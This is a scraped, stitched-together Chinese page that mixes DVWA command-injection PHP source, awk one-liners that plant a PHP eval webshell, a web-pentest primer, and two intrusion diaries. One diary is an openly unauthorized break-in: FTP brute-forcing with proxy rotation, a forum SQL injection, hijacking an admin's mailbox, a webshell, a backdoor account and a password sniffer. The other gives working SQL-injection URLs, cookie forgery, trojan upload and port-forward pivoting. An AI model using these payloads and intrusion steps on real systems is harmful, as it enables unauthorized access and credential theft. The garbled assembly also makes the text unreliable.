Impossible <?phpif( isset( $_POST[ 'Submit' ] ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping ' . $target );}else {// *nix$cmd = shell_exec( 'ping -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";}>;ls $_POST 127.0.0.1;awk 'BEGIN{printf "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,63,62}' >> test.php127.0.0.1;awk 'BEGIN{printf "<?php @eval(%c%c%c%c%c%c[%ca%c]);?>\n",36,95,80,79,83,84,39,39}' >> test.php<?phpif( isset( $_POST[ 'Submit' ] ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Set blacklist$substitutions = array('&&' => '',';' => '',);// Remove any of the charactars in the array (blacklist).$target = str_replace( array_keys( $substitutions ), $substitutions, $target );// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping ' . $target );}else {// *nix$cmd = shell_exec( 'ping -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";}><?phpif( isset( $_POST[ 'Submit' ] ) ) {// Get input$target = trim($_REQUEST[ 'ip' ]);// Set blacklist$substitutions = array('&' => '',';' => '','| ' => '','-' => '','$' => '','(' => '',')' => '','`' => '','||' => '',);// Remove any of the charactars in the array (blacklist).$target = str_replace( array_keys( $substitutions ), $substitutions, $target );// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping ' . $target );}else {// *nix$cmd = shell_exec( 'ping -c 4 ' . $target );}// Feedback for the end userecho "<pre>{$cmd}</pre>";}>|<?phpif( isset( $_POST[ 'Submit' ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );最⾼等级做了Anti-CSRP 的检测,并且把ip 地址split 开来,然后进⾏重新组合,杜绝了命令注⼊的可能性。

Web渗透测试的基础知识点

Web渗透测试的基础知识点

Web渗透测试的基础知识点Web安全是当前互联网上越来越重要的一部分,而Web渗透测试则是保障Web安全的重要工具。

渗透测试为企业、组织、组织的安全团队提供了避免和解决真实攻击的能力。

尽管Web渗透测试在技术和方法上较复杂,但归根结底,它只是一种有系统、科学性和计划性的测试工作而已。

本文将从Web应用程序的特性、Web应用程序开发中的安全漏洞、Web渗透测试的工具和技术、渗透测试的一般流程以及常用防御措施等方面,逐一介绍Web渗透测试的相关知识点。

Web应用程序的特性Web应用程序是客户端通过Web浏览器与分布在互联网络上的远程服务器上的应用程序进行交互的一种网络应用。

Web应用程序有以下特性:1. 开放性Web应用程序是因特网上的开放性应用。

其不能如在内部网络上一样,拥有内部网络的安全和限制级别。

这个开放性特性很容易导致攻击者进入,特别是在应用程序通过Web浏览器开放的输入验证和文件上传等功能中容易导致安全漏洞的形成。

2. 动态性Web应用程序是动态的,后台程序总是通过数据库和其他资源动态地生成内容。

攻击者能够使用Web应用程序上的多重访问来测试漏洞,从而发现攻击点。

3. 复杂性Web应用程序往往由多个功能模块组成,包括前端的HTML/CSS/JavaScript和后端的PHP、、Java等。

由于多个模块的组合,Web应用程序的复杂性通常比传统的桌面应用程序更高。

Web应用程序开发中的安全漏洞Web应用程序开发中的安全漏洞主要分为以下几类:1. XSS攻击漏洞XSS攻击漏洞是一种主要的Web应用程序漏洞,其缺乏正确的安全审核机制或人为输入不安全导致,可能导致攻击者获取受害者的Cookies等敏感信息。

2. SQL注入漏洞SQL注入攻击是指攻击者向Web应用程序提交恶意SQL查询语句,从而以其权限执行意外的行为。

Web开发人员通常使用数据访问层将用户提交的数据源代码从数据访问层中分离出来,因此不应将任何来自用户的数据用于动态构建SQL语句,以防止SQL注入攻击。

渗透某资源网站笔记

渗透某资源网站笔记

渗透某资源网站笔记------------------------------------------------------------------------------------------------------A.ftp 弱口令刺探祭起扫描器,挂上字典,偶就开始扫描了.(因为该站开通ftp 资源下载服务,凡购买其vip 的可以开通ftp 会员账号下载资源),偶寻思着这么多会员里头说不准有那个家伙意识不好...嘿嘿,反正我的目标只要能下载到资源就可以.结果:没有任何弱口令.问题:因为该站设置了匿名登陆,只不过仅仅有浏览的权限而已.我琢磨着扫描器里应该能反映出匿名这个现象呀,为啥没反映呢?答案:于是我用ftp 工具连接目标,账号密码乱填,造成登陆失败.让ftp 工具尝试重复登陆,我发现,在5 刺无效登陆后,服务器返回"拒绝连接"的信息.原来管理员还防范了扫描器的刺探,不简单啊.ps:大伙可给扫描器设置代理,每猜解4 次就自动更换代理.------------------------------------------------------------------------------------------------------B.dvbbs boke 注射漏洞这个漏洞公布出来已经有一阵了,官方还没出补丁.正巧这回用上.结果:的确存在boke 注射漏洞,只不过,该网站的boke 用户只有可怜的几个,其中最高等级的是一个论坛斑竹.我通过注射得到他的md5 密文,去在线md5 密码破解的网站破解了下,幸运地得到他的密码.屁颠屁颠地想登上起爽一下,谁知竟不允许登陆.难道密码不对?我有破了几个,等级为新手,都能成功登陆.原来管管在后台做了ip 限制,崩溃中,tmd 够严格的啊.------------------------------------------------------------------------------------------------------C.主站是动易2005,打全了所有的补丁,我试了很多方法,没有反映.偶也不打算为一个ftp 权限去啃动易的源码去挖漏洞,多不划算啊.嘻嘻------------------------------------------------------------------------------------------------------D.社会工程学信息采集:我在主站和论坛收集了一些管理员的信息,如QQ 号,邮箱,论坛用户名,昵称等等.思路:目的是破解其常用邮箱破解邮箱的办法考虑:密码提示问题(163 的信箱,需要知道生日);猜解现在我无法得知其生日.于是我根据其用户名和昵称,在百度和google 上一顿狂搜.找到了管理员注册过的其他一些网站和论坛.想法:弄到管管注册过的网站的数据,找到那家伙的密码,说不定是通用的呢.奔着这个念头,偶专找软柿子捏.终于成功得到管管在一个论坛上的注册密码,是纯数字的账号密码分析:账号和密码都不复杂,我发现管管有个不良习惯,喜欢用QQ 号码做密码.邮箱破解:我用得到的密码试了下登陆邮箱,失败.根据他使用密码的习惯,我又试了几个他公布在网站上的业务qq 号码,嘿嘿,进去了.-------------------------------------------------------------------------------------------------------E.领土是一点一点扩张出来地进入邮箱后我开始探宝,仔细查看所有"感兴趣"的邮件,同时记录下得到的东西.(这里我得到域名注册信息以及很多很多管管在其他站点注册的信息)整理:现在手头的资料已经很丰富了,我细心整理了一下,同时分析了一些管管常用的账号密码组合,以备后用ftp 的口令我用得到的所有账号密码测试,都无法敲开大门.论坛和主站的后台也是如此.(管管还不是一般的BT!)-------------------------------------------------------------------------------------------------------F.爱要越挫越勇经历了这么多波折,我对这个站是越发感兴趣了.经分析,主站和bbs 不在同一服务器.我用得到的账号口令做了个简单的字典,挂xscan 里扫bbs 所在服务器的ftp 弱口令幸运女神终于降临了,一分钟后我拿到了bbs 的ftp 权限.顺手做了个webshell.通过ftp,我下载回bbs 的数据库,找到后台md5 密文(log 里面没能找到明文的后台密码,另后台也被限制ip 了),破解未遂.这里感谢组织的一兄弟,开了两台服务器帮我破解.尽管未遂!-------------------------------------------------------------------------------------------------------G.意外之喜通过webshell,我寻找着bbs 所在服务器的漏洞.这是用一台叫autohost 的虚拟主机管理软件管理的win2003 服务器.权限设置可以用BT 来形容.我几乎是只能在bbs 所在文件夹打转.当然还能浏览c:\windows;c:\program files;webshell 提权常用的组件被禁用了,服务,用户名不能列举...当我无聊地在c:\program files 转悠的时候,意外的发现一款下载软件的漏洞.(不写出该软件的名称了,免得以后没得玩)该软件有个记录文件,我下载回来用文本编辑工具打开的时候,在一堆乱码中竟然找到了ftp 下载记录,还带着明文的账号和口令.这个发现让我在接下来的提升权限中顺畅无比.(这个口令是管理级的)-------------------------------------------------------------------------------------------------------H.sniffer通过以上的口令,我很轻易的拿到了若干台服务器的admin 权限.(管管都喜欢使用一个复杂的口令管理他所有的服务器, 这点是经过锤炼的经验),幸运的是该管管还习惯使用3389 终端服务来远程管理机子.(我更喜欢)做了个后门帐户,乘月黑风高的夜晚,我悄悄登上去,安了个sniffer,.隔了几天下载回嗅探日志文件,在众多密码当中找到了我的目标-------------------------------------------------------------------------------------------------------I.此次入侵还远未结束此后的日子,我进一步的扩大权限,收集资料.收获到的数据价值是十分巨大的.。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

一次WEB服务器渗透测试笔记作者:佚名文章来源:网络点击数:78 更新时间:2008-11-17渗透测试是最能直接的反映系统的安全性的一种手段了。

现整理了前段时间进行的一次渗透测试的笔记,整个过程中所使用的工具和思路都比较简单,本文也正是为了您的系统不被这些“简单”的东西所击败而作此次渗透测试的已知条件只有一个:目标IP地址211.***.***.114。

首先当然是常规的扫描nmap -v -sS -O 211.***.***.114,得到的结果如下:(The 1641 ports scanned but not shown below are in state: filtered)Port State Service80/tcp open httpDevice type: general purposeRunning: FreeBSD 4.XOS details: FreeBSD 4.7-RELEASE(注意:渗透测试需要有对方授权,任何未经许可的扫描和渗透都有可能受到起诉。

)这个结果让人比较郁闷,只开了80一个端口,而且是freebsd的系统,并用IPFW 或其他firewall进行了严格的过滤,看来这次的渗透要费点脑筋了。

但打开页面看了一下,更加让人丧气情况出现了:所有的连接都是静态的html页面!这意味着没有sql注入可利用,没有脚本漏洞可发掘!只是通过指纹验证httprint知道了web服务器是apache。

嗯,好吧,看来只能扫一下80端口试一下了。

拿出RetinaApacheChunked... ...当扫描结果出现在我眼前的时候,我想我有必要联系一下拉登大叔了,直接把这服务器炸掉算了!!!放弃?!当然不!“一条铁链的强度取决于其最薄弱的一环”,安全也从来都不是单点的安全,所以,扩大扫描的范围说不定会有收获。

当然这个扩大也不是随意的,最好先估算一下对方的地址段的长度,比如这个211.***.***.114,假设掩码是240,则该段地址即为:211.***.***.112-211.***.***.127。

这个不用解释了吧!拿出nmap,扫描从211.***.***.113-211.***.***.126的地址。

得到的结果中最另人感兴趣的是一台开放了80端口的windows2000的主机211.***.***.116。

一种直觉告诉我这台主机就是突破口!http://211.***.***.116出现在我眼前的是一个asp论坛的首页,但奇怪的是该论坛没什么分论坛也没几个注册用户,很可能是一个用来测试的系统。

看了下论坛底部的版本信息“Powered by China Power Board v1.2”,原来是CPB的论坛,而且印象里这个v1.2好像是有注入漏洞,(窃喜)。

用google搜索到一个cpbv1.2研究了一下,原来数据库用的是ACCESS,储存管理员用户名和密码的表名为admin,这是我们最关心的东西,该表有四列:a_id admin password a_grade,其中passoword是使用md5加密过的。

好了知道了这些基本信息,就可以进行下一步了:提交:http://211.***.***.116/list.asp?l_id=1 and exists (select a_id from admin wherea_id=2)返回:Microsoft OLE DB Provider for ODBC Drivers 错误’80004005’[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

/list.asp,行145这些信息说明了:主机211.***.***.116上的cpb论坛的数据库并没有经过改动,与原始的表结构是一样的:表名为admin,管理员的a_id为2,这样就省了我们很多的麻烦。

下面的目标就是要得到管理员的用户名和密码了。

提交:http://211.***.***.116/list.asp?l_id=1 and exists (select admin from admin whereadmin=admin)返回:Microsoft OLE DB Provider for ODBC Drivers 错误’80004005’[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

/list.asp,行145看来连管理员的用户名都还是默认的admin。

那么,密码是不是也是默认的admin呢,想到这里我返回到论坛的首页用用户名admin密码admin登陆,结果失败!看来还是老老实实的猜测password的值吧!提交:http://211.***.***.116/list.asp?l_id=1 and exists (select password from admin where left(password,1)=’a’)返回的是一个报告出错的页面,这点告诉我们由MD5加密后的密码的第一位不是’a’。

注:由MD5加密后的密码长度为16位,每一位是一个16进制数,所以理论上最多猜测256次即可得到该值当提交:http://211.***.***.116/list.asp?l_id=1 and exists (select password from admin where left(password,1)=’1’)返回:Microsoft OLE DB Provider for ODBC Drivers 错误’80004005’[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

/list.asp,行145可以得知第一位是’1’。

同理可以依次得到每一位的值,最终经过耐心的尝试得到’19a7e9898008f09e’。

这一步可能会耗费一些时间,当然也可以通过编写一个脚本来实现自动获取的目的。

好了,现在该轮到MD5的“暴破”专家DeMd5出场了,填入刚刚得到的’19a7e9898008f09e’,下面就可以喝杯咖啡然后等着密码来找你吧!那么难道在密码没有破解出来之前就只有等待么?当然是否定的,我可不想指望着DeMD5能给我一个满意的答案,万一这个管理员用了十几位的数字、大小写字母和符号来组成他的密码,那岂不是惨了?!还好还有COOKIE欺骗这一招可用:用IECookiesView找到名字为211.***.***.116的COOKIE,把其中的password和username分别替换为19a7e9898008f09e和admin,当然在这一步之前要在论坛里注册一个用户。

保存后再打http://211.***.***.116,已经是管理员的身份了。

找到后台的管理入口http://211.***.***.116/admindefault.asp,进去看看有什么可以利用的。

该死,好像没有可以直接上传文件的功能,不过却可以更改用户在前台上传文件的类型。

我毫不犹豫地把asp给加上了。

跑到论坛的主界面通过发贴的方式上传了一个asp 木马,成功!当然不要忘了把帖子删了!其他的扫尾工作倒是可以稍后再做,先看看通过这个跳板我们能得到目标主机211.***.***.114的什么信息吧!在211.***.***.116上扫描211.***.***.114:nmap -v -sS -O 211.***.***.114得到:Port State Service21/tcp open ftp22/tcp open ssh80/tcp open http10000/tcp open snet-sensor-mgmt这样的结果是令人满意的,至少说明211.***.***.114的防火墙对同网段的计算机开放了更多的服务,当然也意味着更多的渗透的机会!首先进入视野的就是ftp服务,如果有弱口令,又有上传的权限,那不就可以... ...先看下ftp服务器的类型,在211.***.***.116上:ftp 211.***.***.114返回:Connected to 211.***.***.114.220 Free FTP server (Version 6.00LS) ready.User (211.***.***.114none)):看来是FreeBSD自带的ftp服务器。

接着拿出Xscan进行针对ftp服务的扫描:xscan -host 211.***.***.114 -ftp可惜结果令人遗憾:没有可以利用的帐号。

后面的22和80也没有什么可以利用的,那就只剩下这个tcp10000的端口了,如果没记错,这应该是webmin的默认端口。

连上去试试再说吧,在211.***.***.116上运行:fpipe -l 8800 -s 8800 -r 10000 211.***.***.114fpipe是一个端口重定向的工具,这条命令的大致意思就是把对本地8800端口的访问重定向到211.***.***.114的10000端口上。

所以我们访问211.***.***.116:8800就等于访问211.***.***.114:10000了。

在本地浏览器里输入http://211.***.***.116:8800一个webmin的登陆界面出现了。

现在的问题就是:怎么进去。

还记得小组赛B组第一轮法国是怎样战胜英格兰的么?答案是:运气!这个webmin问题的答案也是,当我一筹莫展的时候,DeMd5告诉了我一个好消息:211.***.***.116上的cpb论坛的admin的密码为’77889900’,破解出了这个密码算是运气的一部分,而另一部分就是:这个密码也是211.***.***.114上的webmin服务的。

登陆进入webmin以后就等于控制了目标主机211.***.***.114,安装rootkit还是更换页面只是一个选择性的问题了。

至此,任务完成,后面就是要写冗长的渗透测试报告了,但是在那之前我要写几个“如果”。

如果1:211.***.***.116主机上的测试论坛,在测试后就删除了。

如果2:211.***.***.116上的论坛版本为最新的。

如果3:211.***.***.116主机安装了防火强,并做了严格的限制。

如果4:211.***.***.114的ipfw的规则再严格些,只允许管理员的工作站登陆webmin。

如果5:cpb论坛的密码与webmin的密码不相同。

如果6:cpb论坛的密码足够强壮。

......这些个“如果”你做到了么?。

相关文档
最新文档